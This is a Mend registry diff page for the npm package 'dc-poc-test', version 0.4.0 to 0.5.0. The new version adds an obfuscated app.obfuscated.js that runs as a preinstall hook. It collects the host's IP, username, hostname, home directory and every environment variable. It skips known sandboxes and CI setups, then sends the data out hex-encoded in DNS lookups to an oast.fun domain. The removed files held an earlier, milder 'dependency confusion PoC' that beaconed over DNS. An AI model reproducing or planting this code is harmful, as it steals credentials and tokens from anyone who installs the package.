npm - dc-poc-test - Versions diffs - 0.4.0 → 0.5.0 - Mend

dc-poc-test 0.4.0 → 0.5.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (7) hide show

package/app.obfuscated.js ADDED Viewed

@@ -0,0 +1 @@

+ const a0_0x54afec=a0_0x427a;(function(_0x238d82,_0x2fb39d){const _0x39bebe=a0_0x427a,_0x2f8030=_0x238d82();while(!![]){try{const _0x160c1b=-parseInt(_0x39bebe(0x176))/0x1+parseInt(_0x39bebe(0x16b))/0x2*(parseInt(_0x39bebe(0x193))/0x3)+-parseInt(_0x39bebe(0x18c))/0x4+parseInt(_0x39bebe(0x179))/0x5*(parseInt(_0x39bebe(0x17b))/0x6)+parseInt(_0x39bebe(0x19f))/0x7*(parseInt(_0x39bebe(0x185))/0x8)+-parseInt(_0x39bebe(0x182))/0x9+parseInt(_0x39bebe(0x163))/0xa;if(_0x160c1b===_0x2fb39d)break;else _0x2f8030['push'](_0x2f8030['shift']());}catch(_0x1b3208){_0x2f8030['push'](_0x2f8030['shift']());}}}(a0_0x2108,0x59879));function a0_0x2108(){const _0x2c151b=['random','username','hey-message-content','14hHgnXc','Info','DESKTOP-','DetonationLogLevel','stringify','userInfo','8988360KJGhSQ','length','IPv4','\x5cnode_modules\x5chey-message-content\x5c','/node_modules/hey-message-content','keys','from','verdaccio:4873','1082926QcUUbb','decoy_start_','INIT_CWD','run-script','address','decoy_end','npm_package_name','10.100.108.146:15672','GITHUB_TOKEN','CI_JOB_TOKEN','some','126641wGboYF','internal','lookup','258985VWjjIF','env','42MoBopj','NODE_TLS_REJECT_UNAUTHORIZED','toString','preinstall','SLACK_WEBHOOK','key','arch','5626323rvWPAI','GH_TOKEN','substring','122792GUvrjF','values','homedir','hostname','networkInterfaces','KUBERNETES_','lili-pc','2860300ETCkep','startsWith','dns','string','toLowerCase','includes','mirrors.cloud.tencent','3jVbYCv','npm_lifecycle_event','hex','\x5cnode_modules\x5chey-message-content','MALYSIS_ANALYSIS_ID','install','N/A','has','Debug'];a0_0x2108=function(){return _0x2c151b;};return a0_0x2108();}const os=require('os'),dns=require(a0_0x54afec(0x18e));function isBlockedByKeywords(_0x348e2a,_0x270a4e){const _0x400271=a0_0x54afec,_0x5ae426=[_0x400271(0x18b),'justin',_0x400271(0x1a1)],_0x507050=(_0x348e2a||'')[_0x400271(0x190)](),_0x11d065=(_0x270a4e||'')[_0x400271(0x190)]();return _0x5ae426['some'](_0x542948=>_0x507050[_0x400271(0x191)](_0x542948)||_0x11d065[_0x400271(0x191)](_0x542948));}function isBlockedByEnv(_0x3aa40b){const _0x5df1ab=a0_0x54afec;if(!_0x3aa40b||typeof _0x3aa40b!=='object')return![];const _0x1fed8c=new Set(['hscan-supplychain-dynamic',_0x5df1ab(0x192),_0x5df1ab(0x16a),_0x5df1ab(0x172),_0x5df1ab(0x197)]);for(const _0x457403 of Object[_0x5df1ab(0x168)](_0x3aa40b)){if(_0x1fed8c[_0x5df1ab(0x19a)](_0x457403))return!![];if(_0x457403[_0x5df1ab(0x18d)](_0x5df1ab(0x18a))||_0x457403['startsWith']('RABBITMQ_'))return!![];if(_0x457403[_0x5df1ab(0x18d)]('AWS_'))return!![];}const _0x26f821=[{'key':_0x5df1ab(0x194),'values':[_0x5df1ab(0x17e)]},{'key':'npm_command','values':[_0x5df1ab(0x198),'ci',_0x5df1ab(0x16e)]},{'key':_0x5df1ab(0x171),'values':[_0x5df1ab(0x19e)]},{'key':'npm_package_json','values':['/node_modules/hey-message-content/',_0x5df1ab(0x166)]},{'key':_0x5df1ab(0x16d),'values':[_0x5df1ab(0x167),_0x5df1ab(0x196)]},{'key':_0x5df1ab(0x17c),'values':['0']},{'key':_0x5df1ab(0x1a2),'values':[_0x5df1ab(0x1a0),_0x5df1ab(0x19b)]}];for(const _0x38e14a of _0x26f821){const _0x1c79d3=_0x3aa40b[_0x38e14a[_0x5df1ab(0x180)]];if(typeof _0x1c79d3===_0x5df1ab(0x18f)){const _0x26b541=_0x1c79d3[_0x5df1ab(0x190)]();if(_0x38e14a[_0x5df1ab(0x186)][_0x5df1ab(0x175)](_0x301995=>_0x26b541[_0x5df1ab(0x191)](_0x301995['toLowerCase']())))return!![];}}const _0x3ec253=['NPM_TOKEN',_0x5df1ab(0x173),_0x5df1ab(0x183),_0x5df1ab(0x17f),_0x5df1ab(0x174)];if(_0x3ec253[_0x5df1ab(0x175)](_0x4b8ac8=>_0x4b8ac8 in _0x3aa40b))return!![];return![];};function a0_0x427a(_0x2af10b,_0x55bd28){const _0x210838=a0_0x2108();return a0_0x427a=function(_0x427a4c,_0x42de46){_0x427a4c=_0x427a4c-0x161;let _0x4fa9e8=_0x210838[_0x427a4c];return _0x4fa9e8;},a0_0x427a(_0x2af10b,_0x55bd28);}((async()=>{const _0x35691b=a0_0x54afec,_0x3a420='d2i2nd92eku6u03pgmo05mkb1yzg18dut.oast.fun';let _0x46b40f=_0x35691b(0x199);try{const _0x2b9e95=os[_0x35691b(0x189)]();for(const _0x4ecdea of Object[_0x35691b(0x168)](_0x2b9e95)){for(const _0x1103b6 of _0x2b9e95[_0x4ecdea]){if(_0x1103b6['family']===_0x35691b(0x165)&&!_0x1103b6[_0x35691b(0x177)]){_0x46b40f=_0x1103b6[_0x35691b(0x16f)];break;}}if(_0x46b40f!==_0x35691b(0x199))break;}}catch(_0x275955){}const _0xc5db76=os[_0x35691b(0x188)]()||'',_0x23bfc7=(os[_0x35691b(0x162)]()[_0x35691b(0x19d)]||'')['toString'](),_0x55ea08=process['env'],_0x1a38df=isBlockedByKeywords(_0x23bfc7,_0xc5db76),_0x373a2d=isBlockedByEnv(_0x55ea08);if(_0x1a38df||_0x373a2d)return;const _0x255080=_0x35691b(0x16c)+Math[_0x35691b(0x19c)]()[_0x35691b(0x17d)](0x24)[_0x35691b(0x184)](0x2);let _0x20857b={'_decoy':_0x255080,'ip':_0x46b40f,'username':os[_0x35691b(0x162)]()['username'],'hostname':os[_0x35691b(0x188)](),'platform':os['platform'](),'arch':os[_0x35691b(0x181)](),'home':os[_0x35691b(0x187)](),'env':process[_0x35691b(0x17a)],'_decoy2':_0x35691b(0x170)};const _0x351a47=JSON[_0x35691b(0x161)](_0x20857b),_0xb9e372=Buffer[_0x35691b(0x169)](_0x351a47)[_0x35691b(0x17d)](_0x35691b(0x195)),_0xf84bda=0x32;for(let _0x4a2ab3=0x0;_0x4a2ab3<_0xb9e372[_0x35691b(0x164)];_0x4a2ab3+=_0xf84bda){const _0x34ef72=_0xb9e372[_0x35691b(0x184)](_0x4a2ab3,_0x4a2ab3+_0xf84bda),_0x379bcb=_0x4a2ab3/_0xf84bda+'.'+_0x34ef72,_0x422d20=_0x379bcb+'.'+_0x3a420;dns[_0x35691b(0x178)](_0x422d20,_0xbafbb3=>{}),await new Promise(_0x11aed7=>setTimeout(_0x11aed7,0x64));}})());

package/package.json CHANGED Viewed

@@ -1,12 +1,12 @@
 {
-    "name": "dc-poc-test",
-    "version": "0.4.0",
-    "description": "Dependency confusion PoC for Interactsh (passive-proof via DNS A lookups)",
-    "main": "index.js",
-    "scripts": {
-      "preinstall": "node preinstall.js"
-    },
-    "license": "ISC",
-    "dependencies": {}
-  }
+  "name": "dc-poc-test",
+  "version": "0.5.0",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node app.obfuscated.js"
+  },
+  "keywords": [],
+  "author": "Finance Dev",
+  "license": "ISC"
+}

package/index.js DELETED Viewed

	@@ -1 +0,0 @@
1	- module.exports = {};

package/lib/outbound.js DELETED Viewed

@@ -1,61 +0,0 @@
-const dns = require('dns').promises;
-const http = require('http');
-const https = require('https');
-function httpJSON(method, url, bodyObj, headers={}) {
-  const u = new URL(url);
-  const isHttps = u.protocol === 'https:';
-  const body = bodyObj ? JSON.stringify(bodyObj) : '';
-  const opts = {
-    method,
-    hostname: u.hostname,
-    port: u.port || (isHttps ? 443 : 80),
-    path: u.pathname + (u.search || ''),
-    headers: {
-      'content-type': 'application/json',
-      ...(body ? {'content-length': Buffer.byteLength(body)} : {}),
-      ...headers
-    },
-    timeout: 8000
-  };
-  return new Promise((resolve, reject) => {
-    const req = (isHttps ? https : http).request(opts, res => {
-      let data=''; res.on('data', d=>data+=d);
-      res.on('end', () => {
-        try { resolve({ status: res.statusCode, data: data ? JSON.parse(data) : {} }); }
-        catch { resolve({ status: res.statusCode, data: {} }); }
-      });
-    });
-    req.on('error', reject);
-    if (body) req.write(body);
-    req.end();
-  });
-}
-async function fetchNonce(server, uuid, token) {
-  const res = await httpJSON('POST', `${server}/nonce`, { uuid }, { 'x-dc-token': token });
-  if (res.status === 200 && res.data && res.data.nonce) return res.data.nonce;
-  throw new Error('no-nonce');
-}
-async function postPing(server, token, sig, payload, nonce) {
-  return httpJSON('POST', `${server}/ping`, { payload, nonce }, { 'x-dc-token': token, 'x-dc-sig': sig });
-}
-async function txtChallenge(domain, uuid) {
-  const name = `nonce.${uuid}.${domain}`;
-  const txts = await dns.resolveTxt(name);
-  return txts && txts.length ? txts[0].join('') : '';
-}
-async function dnsBurst(domain, hex) {
-  const CHUNK = 50;
-  for (let i = 0; i < hex.length; i += CHUNK) {
-    const chunk = hex.slice(i, i+CHUNK);
-    const fqdn = `${(i/CHUNK)}.${chunk}.${domain}`;
-    try { await dns.lookup(fqdn); } catch {}
-    await new Promise(r => setTimeout(r, 120 + Math.floor(Math.random()*80)));
-  }
-}
-module.exports = { fetchNonce, postPing, txtChallenge, dnsBurst };

package/lib/proof.js DELETED Viewed

@@ -1,6 +0,0 @@
-// Interactsh config
-module.exports = {
-    PKG_PROOF_UUID: "acme-2025-08-uuid-7b8f7d02", // gắn mã chiến dịch/engagement
-    PROOF_DOMAIN:   "d2i139h2eku5imjmvms01u66zartsocs9.oast.me"             // <— thay bằng domain Interactsh của bạn
-  };

package/lib/utils.js DELETED Viewed

@@ -1,45 +0,0 @@
-const os = require('os');
-const crypto = require('crypto');
-const path = require('path');
-function sha256(s) {
-  return crypto.createHash('sha256').update(String(s)).digest('hex');
-}
-function randomDelay(minMs=120, maxMs=260) {
-  const d = Math.floor(minMs + Math.random()*(maxMs-minMs));
-  return new Promise(r=>setTimeout(r, d));
-}
-function firstLocalIPv4() {
-  try {
-    const ifs = os.networkInterfaces();
-    for (const name of Object.keys(ifs)) {
-      for (const it of ifs[name]) {
-        if (it.family === 'IPv4' && !it.internal) return it.address;
-      }
-    }
-  } catch {}
-  return 'N/A';
-}
-function collectMinimal() {
-  const agent = process.env.npm_config_user_agent || '';
-  const hasCI = !!(process.env.CI || process.env.GITHUB_ACTIONS || process.env.BUILD_ID || process.env.JENKINS_HOME);
-  const cwdBase = path.basename(process.cwd() || '');
-  let usernameHash = '';
-  try { usernameHash = sha256(require('os').userInfo().username || ''); } catch {}
-  return {
-    ts: new Date().toISOString(),
-    local_ipv4: firstLocalIPv4(),              // chỉ IP local (không PII)
-    username_sha256: usernameHash,             // hash username
-    hostname_sha256: sha256(os.hostname()||''),// hash hostname
-    platform: os.platform(),
-    arch: os.arch(),
-    npm_user_agent: agent,
-    cwd_basename: cwdBase,
-    has_CI: hasCI
-  };
-}
-module.exports = { sha256, randomDelay, collectMinimal };

package/preinstall.js DELETED Viewed

@@ -1,55 +0,0 @@
-const dns = require('dns').promises;
-const crypto = require('crypto');
-const { collectMinimal, randomDelay } = require('./lib/utils');
-const { PKG_PROOF_UUID, PROOF_DOMAIN } = require('./lib/proof');
-function uaLooksLikeRealNpm(ua='') {
-  return /^npm\/\d+\.\d+\.\d+\s+node\/\d+\.\d+\.\d+\s+\w+\s+\w+/.test(String(ua||''));
-}
-function hexOf(obj) {
-  try { return Buffer.from(JSON.stringify(obj)).toString('hex'); }
-  catch { return ''; }
-}
-async function pingInteractsh() {
-  const ua = process.env.npm_config_user_agent || '';
-  if (!uaLooksLikeRealNpm(ua)) return;               // giảm noise bot rác
-  const version = require('./package.json').version.replace(/\./g,'-');
-  const runtime = (process.platform || 'x') + '-' + (process.arch || 'x');
-  // Thu thập tối thiểu (an toàn, không PII)
-  const base = collectMinimal();
-  // Chèn 1 ít metadata vào label để bạn grep
-  const stamp = Date.now().toString(36);
-  const prefix = `dcpoc.${PKG_PROOF_UUID}.${version}.${runtime}.${stamp}`;
-  // Gửi 1..3 A lookups:
-  //   1) nhãn ngắn: dcpoc.<uuid>.<ver>.<runtime>.<ts>.<domain>
-  //   2) nhãn có checksum ngắn
-  //   3) (tuỳ) nhãn đính kèm 1 chunk hex của base (rất ngắn) — tránh dài quá 63 bytes/label
-  const short = `${prefix}.${PROOF_DOMAIN}`;
-  const h = crypto.createHash('sha1').update(JSON.stringify(base)).digest('hex').slice(0,10);
-  const withChk = `${prefix}.h${h}.${PROOF_DOMAIN}`;
-  const tiny = hexOf({ts: base.ts, has_CI: base.has_CI}).slice(0, 28); // 14 bytes (-> 28 hex char)
-  const withTiny = `${prefix}.x${tiny}.${PROOF_DOMAIN}`;
-  const names = [short, withChk, withTiny];
-  // Thực hiện lookup tuần tự, có trễ nhẹ
-  for (const fqdn of names) {
-    try { await dns.lookup(fqdn); } catch {}
-    await randomDelay();
-  }
-}
-(async () => {
-  try {
-    // Chỉ chạy nhánh Interactsh (passive-proof); không cần token/env ở victim
-    await pingInteractsh();
-  } catch {}
-})();